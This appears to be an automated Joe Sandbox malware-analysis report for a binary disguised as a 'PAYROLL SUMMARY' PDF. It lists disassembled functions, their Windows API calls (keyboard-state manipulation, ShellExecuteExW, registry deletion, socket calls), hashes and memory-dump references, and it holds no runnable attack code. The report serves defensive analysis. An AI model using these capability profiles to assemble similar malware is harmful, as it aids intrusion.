Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
String ID:
API String ID: 1211466189-0
Opcode ID: 7d3ba6b71bf9312653ceb6d8e237f1a9f99516a1493e647a2ea50f4de62b6994
Instruction ID: 9dddf7881452be3a75ce2cd4df0c601511ba3383bdbba489f5011b476087f81d
Opcode Fuzzy Hash: 7d3ba6b71bf9312653ceb6d8e237f1a9f99516a1493e647a2ea50f4de62b6994
Instruction Fuzzy Hash: 36B18871A00626EFDF14CF68C9997ED7BB1BF08711F08C06AEC499A295D731AD60CB90

Function 00252A5B Relevance: 12.1, APIs: 8, Instructions: 129COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0028C417,00000004,00000000,00000000,00000000), ref: 00252ACF
ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0028C417,00000004,00000000,00000000,00000000,000000FF), ref: 00252B17
ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0028C417,00000004,00000000,00000000,00000000), ref: 0028C46A
ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0028C417,00000004,00000000,00000000,00000000), ref: 0028C4D6

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: fd6413fd42e1ae8799be7b0f7fc92db5cce55cb80fca1e605a5e4dab3d2b26d1
Instruction ID: 96bf6737a7d9e5be8a6931f614b3c8426423660b046dc0b0d41ddad90af3f5d0
Opcode Fuzzy Hash: fd6413fd42e1ae8799be7b0f7fc92db5cce55cb80fca1e605a5e4dab3d2b26d1
Instruction Fuzzy Hash: E2414B34634281DAD7359F289D9C77A7B95AB47306F24C41EE887425E0C77198ADC728

Function 002B7368 Relevance: 12.1, APIs: 8, Instructions: 101fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 002B737F

Part of subcall function 00270FF6: std::exception::exception.LIBCMT ref: 0027102C
Part of subcall function 00270FF6: __CxxThrowException@8.LIBCMT ref: 00271041

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 002B73B6
EnterCriticalSection.KERNEL32(?), ref: 002B73D2
_memmove.LIBCMT ref: 002B7420
_memmove.LIBCMT ref: 002B743D
LeaveCriticalSection.KERNEL32(?), ref: 002B744C
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 002B7461
InterlockedExchange.KERNEL32(?,000001F6), ref: 002B7480

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 256516436-0
Opcode ID: 75601a2c013837f190ce025515f1bd4d867a4f94e55e145eeb319a1f63683cd7
Instruction ID: 2395ef58438fa9cfb29e973e99fde635f9012d1f77f98a0e9b4b871ccdd4621e
Opcode Fuzzy Hash: 75601a2c013837f190ce025515f1bd4d867a4f94e55e145eeb319a1f63683cd7
Instruction Fuzzy Hash: E8317031914205EBCF10DF68DD89AAE7BB8EF45710B1481A6FD04AB246DB309E64CBA4

Function 002D6442 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 002D645A
GetDC.USER32(00000000), ref: 002D6462
GetDeviceCaps.GDI32(00000000,0000005A), ref: 002D646D
ReleaseDC.USER32(00000000,00000000), ref: 002D6479
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 002D64B5
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 002D64C6
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,002D9299,?,?,000000FF,00000000,?,000000FF,?), ref: 002D6500
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 002D6520

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 40ce32acbbd9d975535e2ba4c24b740548e0aaac2e61f9412ebce25f7f0c9d42
Instruction ID: 315633ebffc1f92f80d4ede870c9676ee0373cb3846ba69301fd42071cb235b0
Opcode Fuzzy Hash: 40ce32acbbd9d975535e2ba4c24b740548e0aaac2e61f9412ebce25f7f0c9d42
Instruction Fuzzy Hash: 71319F72601210BFEB118F50ED4AFEA3FADEF0A761F044066FE099A295C6759C51CBA4

Function 002AC072 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 002AC087
_memcmp.LIBCMT ref: 002AC0A9
_memcmp.LIBCMT ref: 002AC0C1
_memcmp.LIBCMT ref: 002AC0D4
_memcmp.LIBCMT ref: 002AC0EE
_memcmp.LIBCMT ref: 002AC101
_memcmp.LIBCMT ref: 002AC119
_memcmp.LIBCMT ref: 002AC134

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 369d7758186d3598846d7969f6846cc8c4ccb822eaa9353e4e04dafd659a1b41
Instruction ID: e869bdfac74a911832646fa1883c0b20c51b572765356d39fd7fc110cef7fd8a
Opcode Fuzzy Hash: 369d7758186d3598846d7969f6846cc8c4ccb822eaa9353e4e04dafd659a1b41
Instruction Fuzzy Hash: F821D771771206FBD614AD258C42FBB239DAF23394B644021FE0E96282EF61ED3589A5

Function 002BED8E Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON

Download Yara Rule

APIs

Part of subcall function 00259997: __itow.LIBCMT ref: 002599C2
Part of subcall function 00259997: __swprintf.LIBCMT ref: 00259A0C

Part of subcall function 0026FEC6: _wcscpy.LIBCMT ref: 0026FEE9

_wcstok.LIBCMT ref: 002BEEFF
_wcscpy.LIBCMT ref: 002BEF8E
_memset.LIBCMT ref: 002BEFC1

Strings

X, xrefs: 002BEFFE

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X
API String ID: 774024439-3081909835
Opcode ID: 93df2c7d23c188d61c92e55a419b027aab52a8c0b160e9fb25a002765886d5cc
Instruction ID: 1642c36c475bcb99b691c6adbeed709b71df79b4511ac36f4a62967f5dadad43
Opcode Fuzzy Hash: 93df2c7d23c188d61c92e55a419b027aab52a8c0b160e9fb25a002765886d5cc
Instruction Fuzzy Hash: E3C1A131528301DFC754EF24D981AAAB7E4BF84350F04492DF899972A2DB30EC69CF86

Function 002C6E17 Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 002C6F14
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 002C6F35
WSAGetLastError.WSOCK32(00000000), ref: 002C6F48
htons.WSOCK32(?,?,?,00000000,?), ref: 002C6FFE
inet_ntoa.WSOCK32(?), ref: 002C6FBB

Part of subcall function 002AAE14: _strlen.LIBCMT ref: 002AAE1E
Part of subcall function 002AAE14: _memmove.LIBCMT ref: 002AAE40

_strlen.LIBCMT ref: 002C7058
_memmove.LIBCMT ref: 002C70C1

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
String ID:
API String ID: 3619996494-0
Opcode ID: 22c1badee359620605db2c3743acbb812c459cddeb94e51e3bec194ac94465b4
Instruction ID: 53ee49c73884d5912e3e72ee54b844ea39e2c285e9e121730603e3b0c946116d
Opcode Fuzzy Hash: 22c1badee359620605db2c3743acbb812c459cddeb94e51e3bec194ac94465b4
Instruction Fuzzy Hash: EA81E131524300ABD710EF24CC86F6BB3E9AF84714F14461DF9569B292DB70AD68CF56

Function 00251424 Relevance: 10.7, APIs: 7, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70985f45726e4715720a1e33baa1dfee8a2c1751c987e9e7a210737105a2e3a4
Instruction ID: 5240708308168f39fbdc7903785d10ef1b70133bf18d4a93f80d5f678639144c
Opcode Fuzzy Hash: 70985f45726e4715720a1e33baa1dfee8a2c1751c987e9e7a210737105a2e3a4
Instruction Fuzzy Hash: 4A717C34920109EFCB059F98CC49ABEBB79FF85311F148149F915AA291C730AA25CFA8

Function 002DB60B Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(01944048), ref: 002DB6A5
IsWindowEnabled.USER32(01944048), ref: 002DB6B1
SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 002DB795
SendMessageW.USER32(01944048,000000B0,?,?), ref: 002DB7CC
IsDlgButtonChecked.USER32(?,?), ref: 002DB809
GetWindowLongW.USER32(01944048,000000EC), ref: 002DB82B
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 002DB843

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID:
API String ID: 4072528602-0
Opcode ID: 3818b1b868f5b78e5b12f793979e2d26f5150ea5ef5a9860c984d9da9bab4473
Instruction ID: 16cf35970032ab308975bd4cadc078e6de34686dd5badecf279b80a3f7aaf4f3
Opcode Fuzzy Hash: 3818b1b868f5b78e5b12f793979e2d26f5150ea5ef5a9860c984d9da9bab4473
Instruction Fuzzy Hash: 7771B335A10205EFEB269F64C8A5FAAB7B9FF49300F16405AE956973A1C731EC60CF50

Function 002CF732 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002CF75C
_memset.LIBCMT ref: 002CF825
ShellExecuteExW.SHELL32(?), ref: 002CF86A

Part of subcall function 00259997: __itow.LIBCMT ref: 002599C2
Part of subcall function 00259997: __swprintf.LIBCMT ref: 00259A0C

Part of subcall function 0026FEC6: _wcscpy.LIBCMT ref: 0026FEE9

GetProcessId.KERNEL32(00000000), ref: 002CF8E1
CloseHandle.KERNEL32(00000000), ref: 002CF910

Strings

@, xrefs: 002CF839

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
String ID: @
API String ID: 3522835683-2766056989
Opcode ID: 4a9fa55c32a9a37c7b583be0670f78f560f0fe6fc355c15717a67d02da05fb1e
Instruction ID: d4da1fb3ccb8194145e51ea17d4831b8f6ea9fd3cade579fa2943c4d035491a6
Opcode Fuzzy Hash: 4a9fa55c32a9a37c7b583be0670f78f560f0fe6fc355c15717a67d02da05fb1e
Instruction Fuzzy Hash: E2618C75A20619DFCF14DF54C980AAEBBB5FF48310B14856DE84AAB351CB30AD64CF94

Function 002B145D Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 002B149C
GetKeyboardState.USER32(?), ref: 002B14B1
SetKeyboardState.USER32(?), ref: 002B1512
PostMessageW.USER32(?,00000101,00000010,?), ref: 002B1540
PostMessageW.USER32(?,00000101,00000011,?), ref: 002B155F
PostMessageW.USER32(?,00000101,00000012,?), ref: 002B15A5
PostMessageW.USER32(?,00000101,0000005B,?), ref: 002B15C8

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 48c96f72bf52eb1bfc8a2808205f2a2f2c56b18db50809c74c8d20931ced30b6
Instruction ID: 3aabeb5156f40aed353231c8928d6fc8950b18fed12d1a071e0a643df9a64af3
Opcode Fuzzy Hash: 48c96f72bf52eb1bfc8a2808205f2a2f2c56b18db50809c74c8d20931ced30b6
Instruction Fuzzy Hash: 065104A0A243D63DFB364A348C65BFABFA95B46384F8C4489E1D6468C2C3D4ECB4D750

Function 002B1276 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 002B12B5
GetKeyboardState.USER32(?), ref: 002B12CA
SetKeyboardState.USER32(?), ref: 002B132B
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 002B1357
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 002B1374
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 002B13B8
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 002B13D9

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: cfe1965dc2349d6df31d6297a5e4a3734bf394ca8e01d12cb2d2e393273e7857
Instruction ID: 9faf3d09a2ab050a4c4d18a9ddcfae81f9fa4595e4b5299f976aa3cfc43f7ef8
Opcode Fuzzy Hash: cfe1965dc2349d6df31d6297a5e4a3734bf394ca8e01d12cb2d2e393273e7857
Instruction Fuzzy Hash: 755107A09246D63DFB324B248C65BFABFE95F06380F4884C9E1D5468C2E795ECB4D750

Function 002B589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 002B58AC
_wcsncpy.LIBCMT ref: 002B58E1
_wcsncpy.LIBCMT ref: 002B5913
_wcsncpy.LIBCMT ref: 002B5946
_wcsncpy.LIBCMT ref: 002B5988
_wcsncpy.LIBCMT ref: 002B59C2
_wcsncpy.LIBCMT ref: 002B59F1

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: _wcsncpy$LocalTime
String ID:
API String ID: 2945705084-0
Opcode ID: 10854718d11eae27fc2e8a0e63f44e7fb1c073ddca10505cbff7c71cbb4ecb50
Instruction ID: 8a67c1ba2692740b9c7cfe1a754ad1e4b16f8eaf743bca6b39f119c6944195d0
Opcode Fuzzy Hash: 10854718d11eae27fc2e8a0e63f44e7fb1c073ddca10505cbff7c71cbb4ecb50
Instruction Fuzzy Hash: 19414365C31528B6CB11FBB4888AACFB7AC9F05310F50C956F918E3122E734E765CBA5

Function 002ADA5D Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 002ADAC5
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 002ADAFB
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 002ADB0C
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 002ADB8E

Strings

,,., xrefs: 002ADA69
DllGetClassObject, xrefs: 002ADB01

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: ,,.$DllGetClassObject
API String ID: 753597075-1173203973
Opcode ID: 56c41b0511ea225c1575c0733d7569da24d01221bbcdeae50a090ffeb18fe56d
Instruction ID: 36fba968a482084780136bcffdfafb83d6dff7815710482693c8c3508f4dc089
Opcode Fuzzy Hash: 56c41b0511ea225c1575c0733d7569da24d01221bbcdeae50a090ffeb18fe56d
Instruction Fuzzy Hash: D541C2B1611209EFDB05CF14C884B9ABBB9EF45714F1584AAED0A9F205DBB0DE50CBA0

Function 002B38AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 002B48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,002B38D3,?), ref: 002B48C7

Part of subcall function 002B48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,002B38D3,?), ref: 002B48E0

lstrcmpiW.KERNEL32(?,?), ref: 002B38F3
_wcscmp.LIBCMT ref: 002B390F
MoveFileW.KERNEL32(?,?), ref: 002B3927
_wcscat.LIBCMT ref: 002B396F
SHFileOperationW.SHELL32(?), ref: 002B39DB

Strings

\*.*, xrefs: 002B3969

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
String ID: \*.*
API String ID: 1377345388-1173974218
Opcode ID: f7ab122158cb034c80d7ff03839701cdb583ef688eb46ab8510b3cf3f00f1998
Instruction ID: 10f46a3ec90b9a1a6d5450205d8e5858f2334bdc2338d315142a8e57ced0d0ef
Opcode Fuzzy Hash: f7ab122158cb034c80d7ff03839701cdb583ef688eb46ab8510b3cf3f00f1998
Instruction Fuzzy Hash: 5A41B1724193859EC751EF64D485AEFB7ECAF88380F00482EF48AC3151EA74D69CCB52

Function 002D7500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 002D7519
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002D75C0
IsMenu.USER32(?), ref: 002D75D8
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 002D7620
DrawMenuBar.USER32 ref: 002D7633

Strings

0, xrefs: 002D750D

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert_memset
String ID: 0
API String ID: 3866635326-4108050209
Opcode ID: 2b26fea46e641f21aef621bef7a95fc618ef76edb94efcaa8e75a970e8d61333
Instruction ID: 9a67f9a4708d501d8b74ea48873195fab4bc346ad7dd295dc554f5fb292d5536
Opcode Fuzzy Hash: 2b26fea46e641f21aef621bef7a95fc618ef76edb94efcaa8e75a970e8d61333
Instruction Fuzzy Hash: 5A413875A15609EFDB10DF54E884E9ABBF8FB08310F44812AE96597390E735ED60CF90

Function 002D122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 002D125C
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002D1286
FreeLibrary.KERNEL32(00000000), ref: 002D133D

Part of subcall function 002D122D: RegCloseKey.ADVAPI32(?), ref: 002D12A3
Part of subcall function 002D122D: FreeLibrary.KERNEL32(?), ref: 002D12F5
Part of subcall function 002D122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 002D1318

RegDeleteKeyW.ADVAPI32(?,?), ref: 002D12E0

Memory Dump Source

Source File: 00000000.00000002.2149050211.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.2149035034.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149104856.0000000000305000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149156076.000000000030F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2149177181.0000000000318000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_PAYROLL SUMMARY _pdf.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
